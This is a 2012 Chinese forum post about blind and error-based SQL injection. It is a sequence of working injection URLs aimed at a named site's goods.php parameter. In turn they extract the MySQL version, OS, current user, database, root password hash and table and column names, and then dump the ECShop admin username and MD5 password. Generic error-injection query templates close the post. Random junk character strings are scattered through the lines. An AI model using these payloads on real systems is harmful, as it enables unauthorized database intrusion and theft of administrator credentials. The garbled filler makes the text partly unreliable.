
盲注详细内容

发表于 2012-9-5 14:59:30
判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ `' l; C( o$ u$ t* I3 M

判断系统
$ }( C* l+ \9 I  c: w9 h1 t% e3 h) e( i! X1 {; x9 X% H0 u% w
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* Q! T* _* l$ `% Z7 L0 z4 R
7 z1 I+ y% r  j$ j

* k1 }% |7 S# H  e7 j+ v/ [4 \+ B- `2 `. O8 A/ ~
当前 user()
" v4 j+ U' }7 c
: _$ V$ `1 V1 |4 [8 p5 F* n( chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 o, f* i7 H$ g9 W1 o) X
0 Z' J3 `/ Y9 s. {. \# P3 y; @( ~4 T, v$ ?* w
3 v( H# M5 _) t
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ P7 }" Z) b/ o% k
& s: w. S7 U& n# o: \1 B% B6 J: {* ?. h1 i! \3 t
. v/ w" P* ]  D- |

root hash
; A$ k$ ^3 y! f
% x0 u7 Y( e. F* y! S/ s# jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ k+ C1 }1 l% Z& ?* R, h) ?! m, A
) X, j! Y# F' Q6 H  p+ [* i. S/ n
8 s, f: e0 ~3 \! Y% l
3 r0 {3 M9 v) k! L' ~
当前 数据库表名
6 S* L- R" {! _, _, C1 D: W: d9 J* E! m. W: K2 ^
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 H3 u5 u1 J# ]% ?: @) F

, @) ~! ~5 h  w+ |( C/ a
$ t3 U3 L. k4 z% K
当前 数据库 user_name 字段
3 t; L+ q" \2 h4 ?. ~
! |( u6 e9 @  b6 h  E: D# Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! |9 y* S7 m0 c& L5 p! ]
当前 数据库 字段 password
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 W- i6 j; |7 x- f1 [# v* E( {
( r) b8 f% j) a/ {. R  r
  x/ J& q7 Z) Z% W. b0 H
' A& @  r! Z* e1 c
获得 admin passwd(md5)
# S9 o4 C1 \0 T

& \% X. k, K) m3 u0 F4 v" qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 u& P* h. M& ?0 e6 Q# |% H# c4 t; p( g+ h9 ]
报错注射
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)3 b& u& f/ x& B

5 f7 P6 I. ^9 ]$ m. W2 ZSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)' Z& @8 D% @$ i, a3 b( R5 D

. M; `# N# Q3 tand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)